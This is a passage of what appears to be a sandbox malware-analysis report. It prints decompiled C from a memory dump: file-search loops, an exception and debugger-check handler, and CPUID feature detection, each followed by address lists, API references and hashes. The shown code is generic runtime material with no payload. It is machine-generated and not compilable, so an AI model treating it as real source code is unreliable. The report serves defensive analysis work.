							goto L38;
							L25:
							__eflags = _v612;
							if(_v612 != 0) {
								E01364B6E(_v624);
								_pop(_t113);
							}
							__eflags = FindNextFileW(_t128,  &_v600);
						} while (__eflags != 0);
						_t90 = _v608;
						_t118 = _v664;
						_t123 =  *_t90;
						_t93 =  *((intOrPtr*)(_t90 + 4)) -  *_t90 >> 2;
						__eflags = _t118 - _t93;
						if(_t118 != _t93) {
							__eflags = _t93 - _t118;
							E01386940(_t123, _t123 + _t118 * 4, _t93 - _t118, 4, 0x136dd58);
						}
						FindClose(_t128);
						__eflags = _v636;
						if(_v636 != 0) {
							E01364B6E(_v648);
						}
						_t84 = 0;
					} else {
						_push(_v608);
						_t129 = E0136D74D( &_v600, _t125, 0, 0);
						__eflags = _v636;
						if(_v636 != 0) {
							E01364B6E(_v648);
						}
						_t84 = _t129;
					}
					L38:
					_pop(_t127);
				} else {
					_t8 = _t125 + 1; // 0x1
					if(_t109 == _t8) {
						_t59 = _v601;
						goto L11;
					} else {
						_push(_t123);
						_t84 = E0136D74D(_t109, _t125, 0, 0);
					}
				}
				_pop(_t126);
				_pop(_t107);
				return E01353E0D(_t84, _t107, _v8 ^ _t131, _t123, _t126, _t127);
			}















































                                                                                              0x0136d7fe
                                                                                              0x0136d801
                                                                                              0x0136d803
                                                                                              0x0136d809
                                                                                              0x0136d810
                                                                                              0x0136d813
                                                                                              0x0136d816
                                                                                              0x0136d81b
                                                                                              0x0136d81e
                                                                                              0x0136d826
                                                                                              0x0136d828
                                                                                              0x0136d828
                                                                                              0x0136d82c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136d83f
                                                                                              0x0136d843
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136d843
                                                                                              0x0136d845
                                                                                              0x0136d845
                                                                                              0x0136d84b
                                                                                              0x0136d84d
                                                                                              0x0136d855
                                                                                              0x0136d877
                                                                                              0x0136d879
                                                                                              0x0136d87b
                                                                                              0x0136d887
                                                                                              0x0136d887
                                                                                              0x0136d87d
                                                                                              0x0136d87d
                                                                                              0x0136d87f
                                                                                              0x00000000
                                                                                              0x0136d881
                                                                                              0x0136d881
                                                                                              0x0136d883
                                                                                              0x0136d885
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136d885
                                                                                              0x0136d87f
                                                                                              0x0136d88f
                                                                                              0x0136d897
                                                                                              0x0136d89d
                                                                                              0x0136d89e
                                                                                              0x0136d8a0
                                                                                              0x0136d8a8
                                                                                              0x0136d8ae
                                                                                              0x0136d8b4
                                                                                              0x0136d8ba
                                                                                              0x0136d8ce
                                                                                              0x0136d8d3
                                                                                              0x0136d8de
                                                                                              0x0136d8f4
                                                                                              0x0136d8f6
                                                                                              0x0136d8f9
                                                                                              0x0136d929
                                                                                              0x0136d932
                                                                                              0x0136d932
                                                                                              0x0136d937
                                                                                              0x0136d93d
                                                                                              0x0136d93d
                                                                                              0x0136d943
                                                                                              0x0136d949
                                                                                              0x0136d94f
                                                                                              0x0136d955
                                                                                              0x0136d95b
                                                                                              0x0136d97c
                                                                                              0x0136d981
                                                                                              0x0136d986
                                                                                              0x0136d98a
                                                                                              0x0136d990
                                                                                              0x0136d993
                                                                                              0x0136d9a6
                                                                                              0x0136d9a6
                                                                                              0x0136d9b4
                                                                                              0x0136d9b9
                                                                                              0x0136d9bc
                                                                                              0x0136d9c2
                                                                                              0x0136d9c4
                                                                                              0x0136da3f
                                                                                              0x0136da45
                                                                                              0x0136da4d
                                                                                              0x0136da52
                                                                                              0x0136da54
                                                                                              0x0136da5a
                                                                                              0x0136da60
                                                                                              0x0136da68
                                                                                              0x0136da6d
                                                                                              0x0136da6e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136d995
                                                                                              0x0136d995
                                                                                              0x0136d998
                                                                                              0x0136d99a
                                                                                              0x00000000
                                                                                              0x0136d99c
                                                                                              0x0136d99c
                                                                                              0x0136d99f
                                                                                              0x00000000
                                                                                              0x0136d9a1
                                                                                              0x0136d9a1
                                                                                              0x0136d9a4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136d9a4
                                                                                              0x0136d99f
                                                                                              0x0136d99a
                                                                                              0x00000000
                                                                                              0x0136d9c6
                                                                                              0x0136d9c6
                                                                                              0x0136d9cc
                                                                                              0x0136d9d4
                                                                                              0x0136d9d9
                                                                                              0x0136d9d9
                                                                                              0x0136d9e8
                                                                                              0x0136d9e8
                                                                                              0x0136d9f0
                                                                                              0x0136d9f6
                                                                                              0x0136d9fc
                                                                                              0x0136da03
                                                                                              0x0136da06
                                                                                              0x0136da08
                                                                                              0x0136da0f
                                                                                              0x0136da18
                                                                                              0x0136da1d
                                                                                              0x0136da21
                                                                                              0x0136da27
                                                                                              0x0136da2d
                                                                                              0x0136da35
                                                                                              0x0136da3a
                                                                                              0x0136da3b
                                                                                              0x0136d8fb
                                                                                              0x0136d8fb
                                                                                              0x0136d90c
                                                                                              0x0136d90e
                                                                                              0x0136d914
                                                                                              0x0136d91c
                                                                                              0x0136d921
                                                                                              0x0136d922
                                                                                              0x0136d922
                                                                                              0x0136da74
                                                                                              0x0136da74
                                                                                              0x0136d857
                                                                                              0x0136d857
                                                                                              0x0136d85c
                                                                                              0x0136d871
                                                                                              0x00000000
                                                                                              0x0136d85e
                                                                                              0x0136d85e
                                                                                              0x0136d864
                                                                                              0x0136d869
                                                                                              0x0136d85c
                                                                                              0x0136da78
                                                                                              0x0136da7b
                                                                                              0x0136da82

                                                                                              APIs
                                                                                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0136D8EE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFindFirst
                                                                                              • String ID:
                                                                                              • API String ID: 1974802433-0
                                                                                              • Opcode ID: 5911c2a756ee63acbd3e2ad4cc8e47ad92472586ee1fdc5d943eba35b0871dd1
                                                                                              • Instruction ID: e48491a2c9164ac5007fbd99af33f1c1c794a223a10644e50502047118737025
                                                                                              • Opcode Fuzzy Hash: 5911c2a756ee63acbd3e2ad4cc8e47ad92472586ee1fdc5d943eba35b0871dd1
                                                                                              • Instruction Fuzzy Hash: D171D671E051699FEF21EFBCCC8CAAEBBBDAB45208F1481D9D08D97118DA354E848F54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0136DB70 Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 74%
                                                                                              			E0136DB70(WCHAR* _a4, signed int _a8, char* _a12) {
				signed int _v8;
				short _v552;
				short _v554;
				struct _WIN32_FIND_DATAW _v600;
				char _v601;
				signed int _v608;
				signed int _v612;
				intOrPtr _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t30;
				signed char _t32;
				void* _t41;
				intOrPtr _t43;
				intOrPtr _t45;
				int _t48;
				union _FINDEX_INFO_LEVELS _t60;
				signed int* _t61;
				void* _t62;
				char* _t63;
				WCHAR* _t72;
				void* _t73;
				void* _t76;
				void* _t77;
				signed int _t81;
				void* _t82;

				_t79 = _t81;
				_t82 = _t81 - 0x264;
				_t30 =  *0x139e210; // 0x1911783b
				_v8 = _t30 ^ _t81;
				_t68 = _a8;
				_t63 = _a12;
				_t72 = _a4;
				_v608 = _t63;
				if(_t68 != _t72) {
					while(E0136DD76( *_t68 & 0x0000ffff) == 0) {
						_t68 = _t68 - 2;
						if(_t68 != _t72) {
							continue;
						}
						break;
					}
					_t63 = _v608;
				}
				_t75 =  *_t68 & 0x0000ffff;
				if(( *_t68 & 0x0000ffff) != 0x3a || _t68 ==  &(_t72[1])) {
					_t63 =  &_v601;
					_t32 = E0136DD76(_t75);
					_t68 = (_t68 - _t72 >> 1) + 1;
					asm("sbb eax, eax");
					_t60 = 0;
					_v612 =  ~(_t32 & 0x000000ff) & _t68;
					_t76 = FindFirstFileExW(_t72, 0,  &_v600, 0, 0, 0);
					if(_t76 != 0xffffffff) {
						_t61 = _v608;
						_v608 = _t61[1] -  *_t61 >> 2;
						_t41 = 0x2e;
						do {
							if(_v600.cFileName != _t41 || _v554 != 0 && (_v554 != _t41 || _v552 != 0)) {
								_push(_t61);
								_t43 = E0136DABC(_t63,  &(_v600.cFileName), _t72, _v612);
								_t82 = _t82 + 0x10;
								_v616 = _t43;
								if(_t43 != 0) {
									FindClose(_t76);
									_t45 = _v616;
								} else {
									goto L17;
								}
							} else {
								goto L17;
							}
							goto L22;
							L17:
							_t48 = FindNextFileW(_t76,  &_v600);
							_t41 = 0x2e;
						} while (_t48 != 0);
						_t68 =  *_t61;
						_t66 = _v608;
						_t51 = _t61[1] -  *_t61 >> 2;
						if(_v608 != _t61[1] -  *_t61 >> 2) {
							E01386940(_t68, _t68 + _t66 * 4, _t51 - _t66, 4, 0x136dd58);
						}
						FindClose(_t76);
						_t45 = 0;
					} else {
						_push(_v608);
						goto L8;
					}
				} else {
					_push(_t63);
					_t60 = 0;
					L8:
					_t45 = E0136DABC(_t63, _t72, _t60, _t60);
				}
				L22:
				_pop(_t73);
				_pop(_t77);
				_pop(_t62);
				return E01353E0D(_t45, _t62, _v8 ^ _t79, _t68, _t73, _t77);
			}






























                                                                                              0x0136db73
                                                                                              0x0136db75
                                                                                              0x0136db7b
                                                                                              0x0136db82
                                                                                              0x0136db85
                                                                                              0x0136db88
                                                                                              0x0136db8e
                                                                                              0x0136db91
                                                                                              0x0136db99
                                                                                              0x0136db9b
                                                                                              0x0136dbae
                                                                                              0x0136dbb3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136dbb3
                                                                                              0x0136dbb5
                                                                                              0x0136dbb5
                                                                                              0x0136dbbb
                                                                                              0x0136dbc1
                                                                                              0x0136dbde
                                                                                              0x0136dbe4
                                                                                              0x0136dbf0
                                                                                              0x0136dbf3
                                                                                              0x0136dbf5
                                                                                              0x0136dbfc
                                                                                              0x0136dc11
                                                                                              0x0136dc16
                                                                                              0x0136dc20
                                                                                              0x0136dc30
                                                                                              0x0136dc36
                                                                                              0x0136dc37
                                                                                              0x0136dc3e
                                                                                              0x0136dc5d
                                                                                              0x0136dc6c
                                                                                              0x0136dc71
                                                                                              0x0136dc74
                                                                                              0x0136dc7c
                                                                                              0x0136dccb
                                                                                              0x0136dcd1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136dc7e
                                                                                              0x0136dc86
                                                                                              0x0136dc90
                                                                                              0x0136dc90
                                                                                              0x0136dc96
                                                                                              0x0136dc9a
                                                                                              0x0136dca0
                                                                                              0x0136dca5
                                                                                              0x0136dcc0
                                                                                              0x0136dcc5
                                                                                              0x0136dca8
                                                                                              0x0136dcae
                                                                                              0x0136dc18
                                                                                              0x0136dc18
                                                                                              0x00000000
                                                                                              0x0136dc18
                                                                                              0x0136dbca
                                                                                              0x0136dbca
                                                                                              0x0136dbcb
                                                                                              0x0136dbcd
                                                                                              0x0136dbd0
                                                                                              0x0136dbd5
                                                                                              0x0136dcd7
                                                                                              0x0136dcda
                                                                                              0x0136dcdb
                                                                                              0x0136dcde
                                                                                              0x0136dce5

                                                                                              APIs
                                                                                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 0136DC0B
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0136DC86
                                                                                              • FindClose.KERNEL32(00000000), ref: 0136DCA8
                                                                                              • FindClose.KERNEL32(00000000), ref: 0136DCCB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFile$FirstNext
                                                                                              • String ID:
                                                                                              • API String ID: 1164774033-0
                                                                                              • Opcode ID: 9a39d3243ea728a90739c86065ea41c800379cb7ce23753ad1cfa9d4d41c664c
                                                                                              • Instruction ID: d5de317cf868349882bb89d1399e7ef515600731e622a02f3d258290b4594e67
                                                                                              • Opcode Fuzzy Hash: 9a39d3243ea728a90739c86065ea41c800379cb7ce23753ad1cfa9d4d41c664c
                                                                                              • Instruction Fuzzy Hash: 30419471A0061DAFDF20EFA8DD88DBAB77DEB85208F048195E585D718CE6709E84CF64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0135387F Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 85%
                                                                                              			E0135387F(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E013537F3(_t34);
				 *_t60 = 0x2cc;
				_v632 = E01354D30(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E01354D30(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E013537F3(_t49);
				}
				return _t49;
			}


































                                                                                              0x0135387f
                                                                                              0x0135387f
                                                                                              0x0135387f
                                                                                              0x01353893
                                                                                              0x01353895
                                                                                              0x01353898
                                                                                              0x01353898
                                                                                              0x0135389c
                                                                                              0x013538a1
                                                                                              0x013538b9
                                                                                              0x013538bf
                                                                                              0x013538c5
                                                                                              0x013538cb
                                                                                              0x013538d1
                                                                                              0x013538d7
                                                                                              0x013538dd
                                                                                              0x013538e4
                                                                                              0x013538eb
                                                                                              0x013538f2
                                                                                              0x013538f9
                                                                                              0x01353900
                                                                                              0x01353907
                                                                                              0x01353908
                                                                                              0x01353911
                                                                                              0x01353917
                                                                                              0x0135391a
                                                                                              0x01353920
                                                                                              0x0135392f
                                                                                              0x0135393b
                                                                                              0x01353946
                                                                                              0x0135394d
                                                                                              0x01353954
                                                                                              0x0135395f
                                                                                              0x01353967
                                                                                              0x01353970
                                                                                              0x01353972
                                                                                              0x01353975
                                                                                              0x01353977
                                                                                              0x01353981
                                                                                              0x01353989
                                                                                              0x0135398f
                                                                                              0x00000000
                                                                                              0x01353996
                                                                                              0x01353999

                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0135388B
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 01353957
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01353977
                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 01353981
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 254469556-0
                                                                                              • Opcode ID: 5fd040b01ddaae951ffd0c3958155e04045ec79d63d8a7294eb5d31d68e554e4
                                                                                              • Instruction ID: 953fe6400855b71174a86fbb82bdf661b8897c4c023c78bc9c15541b35ea92a7
                                                                                              • Opcode Fuzzy Hash: 5fd040b01ddaae951ffd0c3958155e04045ec79d63d8a7294eb5d31d68e554e4
                                                                                              • Instruction Fuzzy Hash: A23129B5D4521D9BDF61DFA4D989BCCBBF8BF08704F1040AAE40DAB240EB719A858F45
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01364D13 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 74%
                                                                                              			E01364D13(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				void* _t68;
				intOrPtr _t69;
				signed int _t71;
				signed int _t73;

				_t69 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t71 = _t73;
				_t40 =  *0x139e210; // 0x1911783b
				_t41 = _t40 ^ _t71;
				_v8 = _t40 ^ _t71;
				_push(_t66);
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E013537F3(_t41);
					_pop(_t61);
				}
				E01354D30(_t66,  &_v804, 0, 0x50);
				E01354D30(_t66,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t69;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E013537F3(_t57);
				}
				_pop(_t68);
				return E01353E0D(_t57, _t60, _v8 ^ _t71, _t65, _t68, _t69);
			}







































                                                                                              0x01364d13
                                                                                              0x01364d13
                                                                                              0x01364d13
                                                                                              0x01364d16
                                                                                              0x01364d1e
                                                                                              0x01364d23
                                                                                              0x01364d25
                                                                                              0x01364d2c
                                                                                              0x01364d2d
                                                                                              0x01364d2f
                                                                                              0x01364d32
                                                                                              0x01364d37
                                                                                              0x01364d37
                                                                                              0x01364d43
                                                                                              0x01364d56
                                                                                              0x01364d64
                                                                                              0x01364d6a
                                                                                              0x01364d70
                                                                                              0x01364d76
                                                                                              0x01364d7c
                                                                                              0x01364d82
                                                                                              0x01364d88
                                                                                              0x01364d8e
                                                                                              0x01364d94
                                                                                              0x01364d9a
                                                                                              0x01364da1
                                                                                              0x01364da8
                                                                                              0x01364daf
                                                                                              0x01364db6
                                                                                              0x01364dbd
                                                                                              0x01364dc4
                                                                                              0x01364dc5
                                                                                              0x01364dce
                                                                                              0x01364dd4
                                                                                              0x01364dd7
                                                                                              0x01364ddd
                                                                                              0x01364dea
                                                                                              0x01364df3
                                                                                              0x01364dfc
                                                                                              0x01364e05
                                                                                              0x01364e13
                                                                                              0x01364e15
                                                                                              0x01364e2a
                                                                                              0x01364e36
                                                                                              0x01364e39
                                                                                              0x01364e3e
                                                                                              0x01364e44
                                                                                              0x01364e4b

                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 01364E0B
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 01364E15
                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 01364E22
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                              • String ID:
                                                                                              • API String ID: 3906539128-0
                                                                                              • Opcode ID: 1a3fa8dfc82ec742666911b4ec5e15f748d63f061d748aad2136b5b4dbb5922b
                                                                                              • Instruction ID: b76feda20c725ee157624ecdc300634ee2ab2e0d968b1a213497df1ea9c18f72
                                                                                              • Opcode Fuzzy Hash: 1a3fa8dfc82ec742666911b4ec5e15f748d63f061d748aad2136b5b4dbb5922b
                                                                                              • Instruction Fuzzy Hash: 2F31E874D012299BCB62DF68D888BDDBBF8BF18714F5045DAE41CA7250E7309B818F44
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01353C2D Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 88%
                                                                                              			E01353C2D(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t104;

				_t90 = __edx;
				 *0x139fe20 =  *0x139fe20 & 0x00000000;
				 *0x139e218 =  *0x139e218 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v8 = _v28 ^ 0x49656e69;
				_v12 = _v32 ^ 0x6c65746e;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
					L9:
					_t96 =  *0x139fe24;
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x139fe24 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x139e218; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0x139fe20 = 1;
					 *0x139e218 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0x139fe20 = 2;
						 *0x139e218 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x139e218; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0x139fe20 = 3;
								 *0x139e218 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x139fe20 = 5;
									 *0x139e218 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x139e218 =  *0x139e218 | 0x00000040;
										 *0x139fe20 = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t96 =  *0x139fe24 | 0x00000001;
					 *0x139fe24 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}





























                                                                                              0x01353c2d
                                                                                              0x01353c30
                                                                                              0x01353c3a
                                                                                              0x01353c4b
                                                                                              0x01353dfd
                                                                                              0x01353e00
                                                                                              0x01353e00
                                                                                              0x01353c51
                                                                                              0x01353c57
                                                                                              0x01353c5c
                                                                                              0x01353c60
                                                                                              0x01353c64
                                                                                              0x01353c66
                                                                                              0x01353c68
                                                                                              0x01353c6b
                                                                                              0x01353c70
                                                                                              0x01353c79
                                                                                              0x01353c8a
                                                                                              0x01353c95
                                                                                              0x01353c9b
                                                                                              0x01353c9c
                                                                                              0x01353ca2
                                                                                              0x01353ca5
                                                                                              0x01353caf
                                                                                              0x01353cb2
                                                                                              0x01353cb5
                                                                                              0x01353cb8
                                                                                              0x01353cfd
                                                                                              0x01353cfd
                                                                                              0x01353d03
                                                                                              0x01353d03
                                                                                              0x01353d08
                                                                                              0x01353d09
                                                                                              0x01353d0f
                                                                                              0x01353d41
                                                                                              0x01353d11
                                                                                              0x01353d13
                                                                                              0x01353d14
                                                                                              0x01353d1a
                                                                                              0x01353d1d
                                                                                              0x01353d1f
                                                                                              0x01353d22
                                                                                              0x01353d25
                                                                                              0x01353d28
                                                                                              0x01353d2b
                                                                                              0x01353d34
                                                                                              0x01353d39
                                                                                              0x01353d39
                                                                                              0x01353d34
                                                                                              0x01353d44
                                                                                              0x01353d49
                                                                                              0x01353d4c
                                                                                              0x01353d56
